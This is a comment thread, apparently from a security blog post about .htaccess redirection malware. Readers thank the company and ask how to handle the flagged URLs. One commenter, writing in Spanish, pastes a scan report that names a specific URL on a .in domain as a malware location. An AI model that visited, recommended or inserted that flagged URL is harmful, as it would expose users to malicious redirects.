6 comments
I had a harsh introduction to the .htaccess redirection malware last month, but your company saved my sites, and I can’t say thank you enough.
Rookie question: But what should we do with the URLs you provide in the article above? Should we block them via .htaccess?
You guys rock. Thanks for doing all the heavy lifting keeping up with malware.
Cheers, Carel.
thanx 4 u vigil on malware.
Soy novato en el tema. Segun un scan online tengo un sitio infectado. Este es el reporte. Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwht291
Location: http://storesseeks.in/in.cgi?13
Como lo elimino. En el codigo fuente de la web que me dicen infectada no encontrè ni iframe ni javascript inyectado
Comments are closed.